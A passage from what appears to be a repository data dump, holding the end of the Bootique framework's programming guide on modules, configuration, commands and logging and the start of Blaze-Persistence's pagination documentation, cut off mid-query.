the\n\/\/ specific language governing permissions and limitations\n\/\/ under the License.\n\n== Part II. Programming\n\n=== Modules\n\nBootique apps are made of \"modules\". The framework simply locates all available modules, loads them in the DI environment,\nparses the command line, and then transfers control to a Command (that can originate from any of the modules) that\nmatched the user choice. There's a growing list of modules created by Bootique development team. And you can easily\nwrite your own. 
In fact, programming in Bootique is primarily about writing Modules.\n\nA module is a Java library that contains some code. What makes it a module is a special Java class that implements the\nhttps:\/\/google.github.io\/guice\/api-docs\/latest\/javadoc\/index.html?com\/google\/inject\/Module.html[Guice Module interface].\nThis class defines what \"services\" or other types of objects the module provides (in other words what will be injectable\nby the module users). This is done in the form of \"bindings\", i.e. associations between publicly visible injectable\nservice interfaces and specific implementations:\n\n[source,java]\n----\npublic class MyModule implements Module {\n @Override\n public void configure(Binder binder) {\n binder.bind(MyService.class).to(MyServiceImpl.class);\n }\n}\n----\n\nThere are other flavors of bindings in Guice. Please refer to https:\/\/github.com\/google\/guice\/wiki\/Motivation[Guice documentation]\nfor details. One important form extensively used in Bootique is https:\/\/github.com\/google\/guice\/wiki\/Multibindings[Multibinding].\n\n=== Modules Auto-Loading\n\nModules can be automatically loaded via `Bootique.autoLoadModules()` as long as they are included in your application dependencies. Auto-loading depends on the Java https:\/\/docs.oracle.com\/javase\/8\/docs\/api\/java\/util\/ServiceLoader.html[ServiceLoader mechanism]. To ensure your modules can be auto-loaded, do two things. First, implement the `io.bootique.BQModuleProvider` interface specific to your module:\n\n[source,java]\n----\npublic class MyModuleProvider implements BQModuleProvider {\n @Override\n public Module module() {\n return new MyModule();\n }\n}\n----\n\nAfter that, create a file `META-INF\/services\/io.bootique.BQModuleProvider` whose only line is the name of your BQModuleProvider implementor. E.g.:\n\n[source,text]\n----\ncom.foo.MyModuleProvider\n----\n\n`BQModuleProvider` has two more methods that you can optionally implement to help Bootique make sense of the module being loaded:\n\n[source,java]\n----\npublic class MyModuleProvider implements BQModuleProvider {\n \/\/ ...\n\n \/\/ provides human-readable name of the module\n @Override\n public String name() {\n return \"CustomName\";\n }\n\n \/\/ a collection of modules whose services are overridden by this module\n @Override\n public Collection<Class<? extends Module>> overrides() {\n return Collections.singleton(BQCoreModule.class);\n }\n}\n----\n\nIf in your Module you are planning to redefine any services from the upstream modules, specify those upstream modules in the `overrides()` collection. In practice overrides are rarely needed, and often can be replaced with service decomposition.\n\n=== Configuration and Configurable Factories\n\nBootique Modules obtain their configuration in the form of \"factory objects\". We'll show some examples shortly. For now let's focus on the big picture, namely the fact that Bootique app configuration is multi-layered and roughly follows the sequence of \"code - config files (contributed) - config files (CLI) - overrides\". \"Code\" refers to the default values that are provided in constructors of factory objects. Config files overlay those defaults with their own values. Config files can be either contributed in the code, or specified on the command line. Files are where the bulk of the configuration is usually stored. Finally, config values may be further overridden via Java properties and\/or environment variables.\n\n
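To make the layering concrete, consider a hypothetical sketch (the key `my.threadPoolSize` is made up for illustration; the `bq.` property prefix is covered in \"Configuration via Properties\" below): suppose the factory object's constructor defaults the value to 100, and the app is started with a config file containing\n\n[source,yaml]\n----\nmy:\n threadPoolSize: 5\n----\n\nas well as `-Dbq.my.threadPoolSize=10` on the command line. The YAML value 5 overlays the code default 100, and the property then overrides the YAML value, so the effective value is 10.\n\n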
==== Configuration via YAML Files\n\nThe configuration file format can be either JSON or YAML. For simplicity we'll focus on the YAML format, but the two are interchangeable. Here is an example config file:\n\n[source,yaml]\n----\nlog:\n level: warn\n appenders:\n - type: file\n logFormat: '%c{20}: %m%n'\n file: target\/logback\/debug.log\n\njetty:\n context: \/myapp\n connectors:\n - port: 12009\n----\n\nWhile not strictly required, as a rule the top-level keys in the file belong to configuration objects of individual modules. In the example above the \"log\" subtree configures the `bootique-logback` module, while the \"jetty\" subtree configures `bootique-jetty`. For standard modules refer to module-specific documentation on the structure of the supported configuration (or run your app with the `-H` flag to print the supported config to the console). Here we'll discuss how to build your own configuration-aware module.\n\nBootique allows each Module to read its specific configuration subtree as an object of the type defined in the Module. Very often such an object is written as a factory that contains a bunch of setters for configuration properties, and a factory method to produce some \"service\" that a Module is interested in. Here is an example factory:\n\n[source,java]\n----\npublic class MyFactory {\n\n private int intProperty;\n private String stringProperty;\n\n public void setIntProperty(int i) {\n this.intProperty = i;\n }\n\n public void setStringProperty(String s) {\n this.stringProperty = s;\n }\n\n \/\/ factory method\n public MyService createMyService(SomeOtherService soService) {\n return new MyServiceImpl(soService, intProperty, stringProperty);\n }\n}\n----\n\nThe factory contains configuration property declarations, as well as public setters for these properties. (You may\ncreate getters as well. It is not required, but may be useful for unit tests, etc.) Now let's take a look at the\nModule class:\n\n[source,java]\n----\npublic class MyModule extends ConfigModule {\n\n @Singleton\n @Provides\n public MyService createMyService(\n ConfigurationFactory configFactory,\n SomeOtherService service) {\n\n return config(MyFactory.class, configFactory).createMyService(service);\n }\n}\n----\n\nA sample configuration that will work with our module may look like this:\n\n[source,yaml]\n----\nmy:\n intProperty: 55\n stringProperty: 'Hello, world!'\n----\n\nA few points to note here:\n\n* Subclassing from `ConfigModule` is optional. `ConfigModule` provides a few utilities, such as a shorter \"config\"\nmethod and a default configuration key (\"my\" in this case; see the next bullet).\n* Calling our module \"MyModule\" and extending from `ConfigModule` gives it access to the protected \"configPrefix\"\nproperty that is initialized to the value of \"my\" based on the module class name. The naming convention here is to use\nthe Module's simple class name without the \"Module\" suffix, converted to lowercase.\n* The `@Provides` annotation is Guice's way of marking a Module method as a \"provider\" for a certain type of injectable\nservice. All its parameters are themselves injectable objects.\n* `ConfigurationFactory` is the class used to bind a subtree of the app YAML configuration to a given Java object\n(in our case, `MyFactory`). The structure of MyFactory is very simple here, but it can be as complex as needed,\ncontaining nested objects, arrays, maps, etc. 
Internally Bootique uses the\nhttps:\/\/github.com\/FasterXML\/jackson[Jackson framework] to bind YAML to a Java class, so all the features of Jackson\ncan be used to craft configuration.\n\n==== Configuration File Loading\n\nA config file can be passed to a Bootique app via DI (these usually come from the classpath) or on the command line:\n\n* Contributing a config file via DI:\n+\n[source,java]\n----\nBQCoreModule.extend(binder).addConfig(\"classpath:com\/foo\/default.yml\");\n----\n+\nA primary motivation for this style is to provide application default configuration, with YAML files often embedded in\nthe app and read from the classpath (as suggested by the \"classpath:..\" URL in the example). More than one configuration\ncan be contributed. E.g. individual modules might load their own defaults. Multiple configs are combined in a single\nconfig tree by the runtime. The order in which this combination happens is undefined, so make sure there are no conflicts\nbetween them. If there are, consider replacing multiple conflicting configs with a single config.\n\n* Conditionally contributing a config file via DI. It is possible to make DI configuration inclusion conditional on the\npresence of a certain command line option:\n+\n[source,java]\n----\nOptionMetadata o = OptionMetadata.builder(\"qa\")\n .description(\"when present, uses QA config\")\n .build();\n\nBQCoreModule.extend(binder)\n .addOption(o)\n .mapConfigResource(o.getName(), \"classpath:a\/b\/qa.yml\");\n----\n\n* Specifying a config file on the command line. Each Bootique app supports the `--config` option that takes a configuration\nfile as a parameter. To specify more than one file, use the `--config` option multiple times. Configurations will be loaded\nand merged together in the order of their appearance on the command line.\n\n* Specifying a single config value via a custom option:\n+\n[source,java]\n----\nOptionMetadata o = OptionMetadata.builder(\"db\")\n .description(\"specifies database URL\")\n .valueOptionalWithDefault(\"jdbc:mysql:\/\/127.0.0.1:3306\/mydb\")\n .build();\n\nBQCoreModule.extend(binder)\n .addOption(o)\n .mapConfigPath(o.getName(), \"jdbc.mydb.url\");\n----\n+\nThis adds a new `--db` option to the app that can be used to set the JDBC URL of a datasource called \"mydb\". If the value is\nnot specified, the default one will be used.\n\n==== Configuration via Properties\n\nA YAML file can be thought of as a set of nested properties. E.g. the following config\n\n[source,yaml]\n----\nmy:\n prop1: val1\n prop2: val2\n----\n\ncan be represented as two properties (\"my.prop1\", \"my.prop2\") being assigned some values. Bootique takes advantage of this structural equivalence and allows defining configuration via properties as an alternative (or, more frequently, an addition) to YAML. If the same \"key\" is defined in both the YAML file and a property, `ConfigurationFactory` would use the value of the property (in other words, properties override YAML values).\n\nTo turn a given property into a configuration property, you need to prefix it with \"`bq.`\". 
This \"namespace\" makes configuration explicit and helps to avoid random naming conflicts with properties otherwise present in the system.\n\nProperties can be provided to Bootique via the BQCoreModule extender:\n\n[source,java]\n----\nclass MyModule implements Module {\n public void configure(Binder binder) {\n\n BQCoreModule.extend(binder)\n .setProperty(\"bq.my.prop1\", \"valX\")\n .setProperty(\"bq.my.prop2\", \"valY\");\n }\n}\n----\n\nAlternatively they can be loaded from system properties. E.g.:\n\n[source,bash]\n----\njava -Dbq.my.prop1=valX -Dbq.my.prop2=valY -jar myapp.jar\n----\n\nGenerally, though, this approach is frowned upon, as the authors of Bootique are striving to make Java apps look minimally \"weird\" in deployment, and \"-D\" is one of those unintuitive \"Java-only\" things. Often a better alternative is to define the bulk of configuration in YAML, and pass values for a few environment-specific properties via shell variables (see the next section) or bind them to CLI flags.\n\n==== Configuration via Environment Variables\n\nBootique allows using _environment variables_ to specify\/override configuration values. While variables work similarly to JVM properties, using them has advantages in certain situations:\n\n* They may be used to configure credentials, as unlike YAML they won't end up in version control, and unlike Java properties, they won't be visible in the process list.\n* They provide a customized application environment without changing the launch script and are ideal for containerized and other virtual environments.\n* They are more user-friendly and appear in the app help.\n\nTo declare variables associated with configuration values, use the following API (notice that no \"bq.\" prefix is necessary here to identify the configuration value):\n\n[source,java]\n----\nclass MyModule implements Module {\n public void configure(Binder binder) {\n\n BQCoreModule.extend(binder)\n .declareVar(\"my.prop1\", \"P1\")\n .declareVar(\"my.prop2\", \"P2\");\n }\n}\n----\n\nSo now a person running the app may set the above configuration as\n\n[source,bash]\n----\nexport P1=valX\nexport P2=valY\n----\n\nMoreover, explicitly declared vars will automatically appear in the application help, assisting the admins in configuring your app.\n\n_(TODO: document BQConfig and BQConfigProperty config factory annotations required for the help generation to work)_\n\n[source,bash]\n----\n$ java -jar myapp-1.0.jar --help\n...\nENVIRONMENT\n P1\n Sets value of some property.\n\n P2\n Sets value of some other property.\n----\n\nNOTE: The previously used naming convention of binding variables that start with `BQ_*` to config values is deprecated, and support for it will be removed soon. Such an approach was causing too much unexpected behavior in non-containerized environments. The alternative is the explicitly declared variables described above.\n\n==== Polymorphic Configuration Objects\n\nA powerful feature of Jackson is the ability to dynamically create subclasses of the configuration objects. Bootique takes full advantage of this. E.g. imagine a logging module that needs \"appenders\" to output its log messages (file appender, console appender, syslog appender, etc.). The framework might not be aware of all possible appenders its users might come up with in the future. Yet it still wants to have the ability to instantiate any of them, based solely on the data coming from YAML. Moreover, each appender will have its own set of incompatible configuration properties. 
In fact this is exactly the situation with the `bootique-logback` module.\n\nHere is how you ensure that such a polymorphic configuration is possible. Let's start with a simple class hierarchy:\n\n[source,java]\n----\npublic abstract class BaseType {\n \/\/ ...\n}\n\npublic class ConcreteType1 extends BaseType {\n \/\/ ...\n}\n\npublic class ConcreteType2 extends BaseType {\n \/\/ ...\n}\n----\n\nNow let's create a matching set of factories to create one of the concrete subtypes of `BaseType`. Let's use Jackson annotations to link specific types to the symbolic names used in the YAML below:\n\n[source,java]\n----\n@JsonTypeInfo(use = JsonTypeInfo.Id.NAME,\n property = \"type\",\n defaultImpl = ConcreteTypeFactory1.class)\npublic abstract class BaseTypeFactory implements PolymorphicConfiguration {\n\n public abstract BaseType create();\n}\n\n@JsonTypeName(\"type1\")\npublic class ConcreteTypeFactory1 extends BaseTypeFactory {\n\n @Override\n public BaseType create() {\n return new ConcreteType1();\n }\n}\n\n@JsonTypeName(\"type2\")\npublic class ConcreteTypeFactory2 extends BaseTypeFactory {\n\n @Override\n public BaseType create() {\n return new ConcreteType2();\n }\n}\n----\n\nAfter that we need to create a service provider file called `META-INF\/services\/io.bootique.config.PolymorphicConfiguration` where all the types participating in the hierarchy are listed (including the supertype):\n\n[source,text]\n----\ncom.foo.BaseTypeFactory\ncom.foo.ConcreteTypeFactory1\ncom.foo.ConcreteTypeFactory2\n----\n\nThis should be enough to work with configuration like this:\n\n[source,yaml]\n----\nmy:\n type: type2\n someVar: someVal\n----\n\nThe service of `BaseType` is bound in Guice using the standard `ConfigurationFactory` approach described above. Depending on the YAML config,\none of the subclasses of `BaseType` will be created:\n\n[source,java]\n----\n@Provides\npublic BaseType provideBaseType(ConfigurationFactory configFactory) {\n\n return configFactory\n .config(BaseTypeFactory.class, \"my\")\n .create();\n}\n----\n\nIf another module decides to create yet another subclass of BaseType, it will need to create its own `META-INF\/services\/io.bootique.config.PolymorphicConfiguration` file and add a new factory name there.\n\n=== Using Modules\n\nModules can use other \"upstream\" modules in a few ways:\n\n* \"Import\": a downstream module uses another module as a library, ignoring its injectable services.\n* \"Use\": a downstream module's classes inject classes from an upstream module.\n* \"Contribute\": a downstream module injects objects into collections and maps defined in upstream modules.\n\nThe import case is trivial, so we'll concentrate on the two remaining scenarios. We will use https:\/\/github.com\/bootique\/bootique\/blob\/master\/bootique\/src\/main\/java\/io\/bootique\/BQCoreModule.java[BQCoreModule] as an example of an upstream module, as it is available in all apps.\n\n==== Injecting Other Module's Services\n\nYou can inject any services declared in other modules. E.g. BQCoreModule provides a number of objects and services that can be accessed via injection:\n\n[source,java]\n----\nclass MyService {\n\n @Args\n @Inject\n private String[] args;\n\n public String getArgsString() {\n return Arrays.asList(args).stream().collect(joining(\" \"));\n }\n}\n----\n\nIn this example we injected the command line arguments that were used to start the app. Note that since there can potentially be more than one `String[]` in a DI container, the Bootique `@Args` annotation is used to uniquely identify the array that we want here.\n\n
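Another example (a minimal sketch; it assumes the injectable `BootLogger` service and its `stdout(String)` method, both described in the \"BootLogger\" section) is injecting Bootique's own boot-time logger into application code:\n\n[source,java]\n----\nclass MyDiagnosticsService {\n\n \/\/ BootLogger is provided by Bootique core and is itself injectable\n @Inject\n private BootLogger bootLogger;\n\n public void reportStartup() {\n bootLogger.stdout(\"MyDiagnosticsService is ready\");\n }\n}\n----\n\n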
==== Contributing to Other Modules\n\nGuice supports https:\/\/github.com\/google\/guice\/wiki\/Multibindings[multibindings], intended to _contribute_ objects defined in a downstream module to collections\/maps used by services in upstream modules. Bootique hides Guice API complexities, usually providing \"extenders\" in each module. E.g. the following code adds `MyCommand` to the app's set of commands:\n\n[source,java]\n----\npublic class MyModule implements Module {\n\n @Override\n public void configure(Binder binder) {\n BQCoreModule.extend(binder).addCommand(MyCommand.class);\n }\n}\n----\n\nHere we obtained an extender instance via a static method on BQCoreModule. Most standard modules define their own extenders accessible via `“extend(Binder)”`. This is a pattern you might want to follow in your own modules.\n\n=== Application Class\n\nA class that contains the `“main()”` method is informally called the \"application\". Bootique does not impose any additional requirements on this class. You decide what to put in it. It can be limited to just `“main()”`, or turned into a REST API resource, etc.\n\n==== Application as a Module\n\nMore often than not, it makes sense to turn the application class into a Module though. After all, a Bootique app is just a collection of Modules, and this way the application class would represent that one final Module to rule them all:\n\n[source,java]\n----\npublic class Application implements Module {\n\n public static void main(String[] args) {\n Bootique.app(args).module(Application.class).autoLoadModules().exec().exit();\n }\n\n public void configure(Binder binder) {\n \/\/ load app-specific services; redefine standard ones\n }\n}\n----\n\nYou may also implement a separate BQModuleProvider for the Application module. Then `autoLoadModules()` will discover it just like any other Module, and there won't be a need to add the Application module explicitly.\n\n==== Common Main Class\n\nIf all your code is packaged in auto-loadable modules (which is always a good idea), you may not even need a custom main class. The `io.bootique.Bootique` class itself declares a `main()` method and can be used as an app launcher. This creates some interesting possibilities. E.g. you can create Java projects that have no code of their own and are simply collections of modules declared as compile dependencies. More details on packaging are given in the \"Runnable Jar\" chapter.\n\n=== Commands\n\nThe Bootique runtime contains a set of commands coming from Bootique core and from all the modules currently in effect in the app. On startup Bootique attempts to map command-line arguments to a single command type. If no match is found, a _default_ command is executed (which is normally a \"help\" command). To list all available commands, the app can be run with the `--help` option (in most cases running without any options will have the same effect). 
E.g.:\n\n[source,bash]\n----\n$ java -jar myapp-1.0.jar --help\n\nNAME\n com.foo.MyApp\n\nOPTIONS\n -c yaml_location, --config=yaml_location\n Specifies YAML config location, which can be a file path or a URL.\n\n -h, --help\n Prints this message.\n\n -H, --help-config\n Prints information about application modules and their configuration\n options.\n\n -s, --server\n Starts Jetty server.\n\n----\n\n==== Writing Commands\n\nMost common commands are already available in various standard modules, still often you'd need to write your own. To do that, first create a command class. It should implement `io.bootique.command.Command` interface, though usually it more practical to extend `io.bootique.command.CommandWithMetadata` and provide some metadata used in help and elsewhere:\n\n[source,java]\n----\npublic class MyCommand extends CommandWithMetadata {\n\n private static CommandMetadata createMetadata() {\n return CommandMetadata.builder(MyCommand.class)\n .description(\"My command does something important.\")\n .build();\n }\n\n public MyCommand() {\n super(createMetadata());\n }\n\n @Override\n public CommandOutcome run(Cli cli) {\n\n \/\/ ... run the command here....\n\n return CommandOutcome.succeeded();\n }\n}\n----\n\nThe command initializes metadata in constructor and implements the \"run\" method to run its code. The return CommandOutcome object instructs Bootique what to do when the command finishes. The object contains desired system exit code, and exceptions that occurred during execution. To make the new command available to Bootique, add it to `BQCoreModule`'s extender, as was already shown above:\n\n[source,java]\n----\npublic class MyModule implements Module {\n\n @Override\n public void configure(Binder binder) {\n BQCoreModule.extend(binder).addCommand(MyCommand.class);\n }\n}\n----\n\nTo implement a \"daemon\" command running forever until it receives an OS signal (e.g. a web server waiting for user requests) , do something like this:\n\n[source,java]\n----\n@Override\npublic CommandOutcome run(Cli cli) {\n\n \/\/ ... start some process in a different thread ....\n\n \/\/ now wait till the app is stopped from another thread\n \/\/ or the JVM is terminated\n try {\n Thread.currentThread().join();\n } catch (InterruptedException e) {\n \/\/ ignore exception or log if needed\n }\n\n return CommandOutcome.succeeded();\n}\n----\n\n==== Injection in Commands\n\nCommands can inject services, just like most other classes in Bootique. There are some specifics though. Since commands are sometimes instantiated, but not executed (e.g. when `--help` is run that lists all commands), it is often desirable to avoid immediate instantiation of all dependencies of a given command. So a common pattern with commands is to inject Guice `Provider` instead of direct dependency:\n\n[source,java]\n----\n@Inject\nprivate Provider<SomeService> provider;\n\n@Override\npublic CommandOutcome run(Cli cli) {\n provider.get().someMethod();\n}\n----\n\n==== Decorating Commands\n\nEach command typically does a single well-defined thing, such as starting a web server, executing a job, etc. But very often in addition to that main thing you need to do other things. E.g. 
when a web server is started, you might also want to run a few more commands:\n\n* Before starting the server, run a health check to verify that any external services the app might depend upon are alive.\n* Start a job scheduler in the background.\n* Start a monitoring \"heartbeat\" thread.\n\nTo run all these \"secondary\" commands when the main command is invoked, Bootique provides command decorator API. First you create a decorator policy object that specifies one or more secondary commands and their invocation strategy (either _before_ the main command, or _in parallel_ with it). Second you \"decorate\" the main command with that policy:\n\n[source,java]\n----\nCommandDecorator extraCommands = CommandDecorator\n .beforeRun(CustomHealthcheckCommand.class)\n .alsoRun(ScheduleCommand.class)\n .alsoRun(HeartbeatCommand.class);\n\nBQCoreModule.extend(binder).decorateCommand(ServerCommand.class, extraCommands);\n----\n\nBased on the specified policy Bootique figures out the sequence of execution and runs the main and the secondary commands.\n\n=== Options\n\n==== Simple Options\n\nIn addition to commands, the app can define \"options\". Options are not associated with any runnable java code, and simply pass command-line values to commands and services. E.g. the standard \"`--config`\" option is used by `CliConfigurationSource` service to locate configuration file. Unrecognized options cause application startup errors. To be recognized, options need to be \"contributed\" to Bootique similar to commands:\n\n[source,java]\n----\nOptionMetadata option = OptionMetadata\n .builder(\"email\", \"An admin email address\")\n .valueRequired(\"email_address\")\n .build();\n\nBQCoreModule.extend(binder).addOption(option);\n----\n\nTo read a value of the option, a service should inject `io.bootique.cli.Cli` object (commands also get this object as a parameter to \"run\") :\n\n[source,java]\n----\n@Inject\nprivate Cli cli;\n\npublic void doSomething() {\n Collection<String> emails = cli.optionStrings(\"email\");\n \/\/ do something with option values....\n}\n----\n\n==== Configuration Options\n\nWhile you can process your own options as described above, options often are just aliases to enable certain pieces of configuration. Bootique supports three flavors of associating options with configuration. Let's demonstrate them here.\n\n. Option value sets a config property:\n+\n[source,java]\n----\n\/\/ Starting the app with \"--my-opt=x\" will set \"jobs.myjob.param\" value to \"x\"\nBQCoreModule.extend(binder)\n .addOption(OptionMetaData.builder(\"my-opt\").build())\n .mapConfigPath(\"my-opt\", \"jobs.myjob.param\");\n----\n. Option presence sets a property to a predefined value:\n+\n[source,java]\n----\n\/\/ Starting the app with \"--my-opt\" will set \"jobs.myjob.param\" value to \"y\"\nBQCoreModule.extend(binder)\n .addOption(OptionMetaData.builder(\"my-opt\").valueOptionalWithDefault(\"y\").build())\n .mapConfigPath(\"my-opt\", \"jobs.myjob.param\");\n----\n. Option presence loads a config resource, such as a YAML file:\n+\n[source,java]\n----\n\/\/ Starting the app with \"--my-opt\" is equivalent to starting with \"--config=classpath:xyz.yml\"\nBQCoreModule.extend(binder)\n .addOption(OptionMetaData.builder(\"my-opt\").build())\n .mapConfigResource(\"my-opt\", \"classpath:xyz.yml\");\n----\n\nThe order of config-bound options on the command line is significant, just as the order of \"`--config`\" parameters. 
Bootique merges configuration associated with options from left to right, overriding any preceding configuration if there is an overlap.\n\n=== Logging\n\n==== Loggers in the Code\n\nStandard Bootique modules use http:\/\/www.slf4j.org\/[SLF4J] internally, as it is the most convenient least common denominator framework, and can be easily bridged to other logging implementations. Your apps or modules are not required to use SLF4J, though if they do, it will likely reduce the amount of bridging needed to route all logs to a single destination.\n\n==== Configurable Logging with Logback\n\nFor better control over logging a standard module called `bootique-logback` is available, that integrates http:\/\/logback.qos.ch\/[Logback framework] in the app. It seamlessly bridges SLF4J (so you keep using SLF4J in the code), and allows to configure logging via YAML config file, including appenders (file, console, etc.) and per class\/package log levels. Just like any other module, `bootique-logback` can be enabled by simply adding it to the pom.xml dependencies, assuming `autoLoadModules()` is in effect:\n\n[source,xml]\n----\n<dependency>\n <groupId>io.bootique.logback<\/groupId>\n <artifactId>bootique-logback<\/artifactId>\n<\/dependency>\n----\n\nSee `bootique-logback` module http:\/\/bootique.io\/docs\/0\/bootique-logback-docs\/[documentation] for further details.\n\n==== BootLogger\n\nTo perform logging during startup, before DI environment is available and YAML configuration is processed, Bootique uses a special service called `BootLogger`, that is not dependent on SLF4J and is not automatically bridged to Logback. It provides an abstraction for writing to stdout \/ stderr, as well as conditional \"trace\" logs sent to stderr. To enable Bootique trace logs, start the app with `-Dbq.trace` as described in the deployment section.\n\nBootLogger is injectable, in case your own code needs to use it. If the default BootLogger behavior is not satisfactory, it can be overridden right in the `main(..)` method, as unlike other services, you may need to change it before DI is available:\n\n[source,java]\n----\npublic class Application {\n public static void main(String[] args) {\n Bootique.app(args).bootLogger(new MyBootLogger()).run();\n }\n}\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0303ae8b605c89ec853d2e016b0c2bc3373aa9f3","subject":"Fixed #118","message":"Fixed #118\n","repos":"Blazebit\/blaze-persistence,Blazebit\/blaze-persistence,Blazebit\/blaze-persistence,Blazebit\/blaze-persistence","old_file":"documentation\/src\/main\/asciidoc\/core\/manual\/en_US\/13_pagination.adoc","new_file":"documentation\/src\/main\/asciidoc\/core\/manual\/en_US\/13_pagination.adoc","new_contents":"== Pagination\n\nPagination is often used to make large data sets consumable. 
It requires an ordered set of elements\/rows to be able to deterministically split the data into pages.\nImagine the following ordered data set\n\n[ditaa, nolightbox=\"true\"]\n....\n+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+\n| a | b | c | d | e | f | g | h | i | j | k | l | m | n | o | p | q | r | s | t | u | v | w | x | y | z |\n+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+\n....\n\nIf we split it up into pages of the size of 5 elements we get 6 pages and the last one only containing 1 element\n\n[ditaa, nolightbox=\"true\"]\n....\n +---+ +---+ +---+ +---+ +---+ +---+\n | a | | f | | k | | p | | u | | z |\n +---+ +---+ +---+ +---+ +---+ +---+\n | b | | g | | l | | q | | v |\n +---+ +---+ +---+ +---+ +---+\n | c | | h | | m | | r | | w |\n +---+ +---+ +---+ +---+ +---+\n | d | | i | | n | | s | | x |\n +---+ +---+ +---+ +---+ +---+\n | e | | j | | o | | t | | y |\n +---+ +---+ +---+ +---+ +---+\n\nPage 1 2 3 4 5 6\n....\n\n{projectname} provides two ways to do pagination.\n\n* Conventional pagination via link:{core_doc}\/persistence\/LimitBuilder.html#setFirstResult(int)[`setFirstResult()`] and link:{core_doc}\/persistence\/LimitBuilder.html#setMaxResults(int)[`setMaxResults()`]\n* Extended pagination support via the link:{core_doc}\/persistence\/PaginatedCriteriaBuilder.html[`PaginatedCriteriaBuilder`] API\n\nConventional pagination in JPA only works on the main query which is also possible with {projectname}.\n\n[source, java]\n----\nList<Cat> secondCat = cbf.create(em, Cat.class)\n .orderByAsc(\"id\")\n .setFirstResult(1)\n .setMaxResults(1)\n .getResultList();\n----\n\n[source,sql]\n----\nSELECT cat\nFROM Cat cat\nORDER BY cat.id ASC NULLS LAST\n--LIMIT 1 OFFSET 1\n----\n\nIn addition to that, offset pagination for subqueries is also possible.\n\n[source, java]\n----\nList<Cat> secondCat = cbf.create(em, Cat.class)\n .fetch(\"kittens\")\n .where(\"id\").in()\n .from(Cat.class, \"subCat\")\n .select(\"subCat.id\")\n .orderByAsc(\"id\")\n .setFirstResult(1)\n .setMaxResults(1)\n .end()\n .getResultList();\n----\n\n[source,sql]\n----\nSELECT cat\nFROM Cat cat\nLEFT JOIN FETCH cat.kittens kittens_1\nWHERE cat.id IN LIMIT((\n SELECT subCat.id\n FROM Cat cat\n ORDER BY cat.id ASC NULLS LAST\n),1 ,1) --LIMIT 1 OFFSET 1\n----\n\nThe extended pagination support comes via the criteria builder's link:{core_doc}\/persistence\/FullQueryBuilder.html#page(int,%20int)[`page()`] methods which come in three flavours:\n\nlink:{core_doc}\/persistence\/FullQueryBuilder.html#page(int,%20int)[`page(int firstResult, int maxResults)`]::\n\n Performs <<anchor-offset-pagination,offset pagination>> by skipping `firstResult` elements and from there on, show `maxResults` elements.\n\nlink:{core_doc}\/persistence\/FullQueryBuilder.html#page(com.blazebit.persistence.KeysetPage,%20int,%20int)[`page(KeysetPage keysetPage, int firstResult, int maxResults)`]::\n\n Performs <<anchor-keyset-pagination,keyset pagination>> if possible and falls back to offset pagination otherwise.\n\nlink:{core_doc}\/persistence\/FullQueryBuilder.html#page(java.lang.Object,%20int)[`page(Object entityId, int maxResults)`]::\n\n Navigates to the <<anchor-navigate-entity-page,page containing the entity>> with the given `entityId`. 
Falls back to the first page if no entity for the id exists.\n\n=== Under the hood\n\nIn {projectname} we have followed a more involved approach for implementing pagination than plainly using JPA standard\nmethods like `javax.persistence.Query.setMaxResults()` or `javax.persistence.Query.setFirstResult()` to steer the result set\ndimensions. This is due to deficiencies in some JPA providers when it comes to handling paginated queries containing\njoin fetches for collections.\n\nNOTE: By default, when using fetch joins for collections with Hibernate, all results are fetched instead of only the selected page.\n\nThe approach used in {projectname} consists of up to three queries executed consecutively:\n\n. The *count query* is used to fetch the total element count which is needed to populate `com.blazebit.persistence.PagedList.getTotalSize()` and\n`com.blazebit.persistence.PagedList.getTotalPages()`. If this query returns 0, no further queries are executed.\n\n. The *ID query* is used to fetch the entity ids that are contained in the target page. In this step, the previously\n mentioned `javax.persistence.Query.setMaxResults()` and `javax.persistence.Query.setFirstResult()` are used to select the\n target ID set. Only selecting the IDs allows omitting all fetch joins, especially collection joins that might trigger inefficient JPA provider\n strategies. The *ID query* is omitted if no collection fetch joins are done, because in that case JPA providers tend to do the right thing when paginating directly.\n\n. Finally, the *object query* is used to fetch the entities as described by the original query specified by the user.\nThis query uses an `IN` predicate for the ID set retrieved in the previous step to restrict the fetched entities to the target\npage.\n\nNOTE: In a future version it might be possible to combine queries or disable the count query. For more information on that see https:\/\/github.com\/Blazebit\/blaze-persistence\/issues\/248[#248],\nhttps:\/\/github.com\/Blazebit\/blaze-persistence\/issues\/249[#249] and https:\/\/github.com\/Blazebit\/blaze-persistence\/issues\/255[#255]\n\nTIP: You can inspect the query strings by using link:{core_doc}\/persistence\/PaginatedCriteriaBuilder.html#getPageCountQueryString()[`getPageCountQueryString()`],\nlink:{core_doc}\/persistence\/PaginatedCriteriaBuilder.html#getPageIdQueryString()[`getPageIdQueryString()`] and link:{core_doc}\/persistence\/Queryable.html#getQueryString()[`getQueryString()`]\n\n[[anchor-offset-pagination]]\n=== Offset pagination\n\nAs already laid out in the <<pagination,introduction>>, pagination works on an ordered set of elements\/rows.\nOffset pagination basically looks at the ordered set from left to right and counts elements until the count reaches `firstResult`.\nFrom that point on elements are collected until `maxResults` elements have been collected or no more elements are available.\n\nThis basically means that the `OFFSET` i.e. 
`firstResult` part forces a DBMS to actually determine whether an element\/row is visible for a transaction and then _ignore_\/_skip_ it.\nThe bigger the `firstResult` value, the more resources the DBMS has to waste on _skipping_ elements\/rows.\nThis essentially means that when employing offset pagination, accessing the latter pages will become more and more expensive.\nIn order for this approach to be actually usable with larger data sets, a DBMS index that can be used for the ordering is required to avoid constantly loading and sorting data.\nIn addition to that, the DBMS should have enough RAM to keep the index fully in-memory to avoid costly disk fetches.\n\nAlthough offset pagination works in every case, it should be avoided if possible because of the performance implications.\nAs you will see in the <<anchor-keyset-pagination,keyset pagination part>> there is a more efficient approach to pagination that almost uses the same API.\n\nThe following example illustrates the usage and what happens behind the scenes:\n\n[source, java]\n----\nPagedList<Cat> page2 = cbf.create(em, Cat.class)\n .fetch(\"kittens\")\n .orderByAsc(\"id\") \/\/ unique ordering is required for pagination\n .page(5, 5)\n .getResultList();\n----\n\nThis executes the following queries:\n\n[.Count query]\n[source,sql]\n----\nSELECT COUNT(*)\nFROM Cat cat\n----\n\nNote that the *ID query* is necessary because of the join-fetched collection `kittens`.\n\n[.ID query]\n[source,sql]\n----\nSELECT cat.id\nFROM Cat cat\nORDER BY 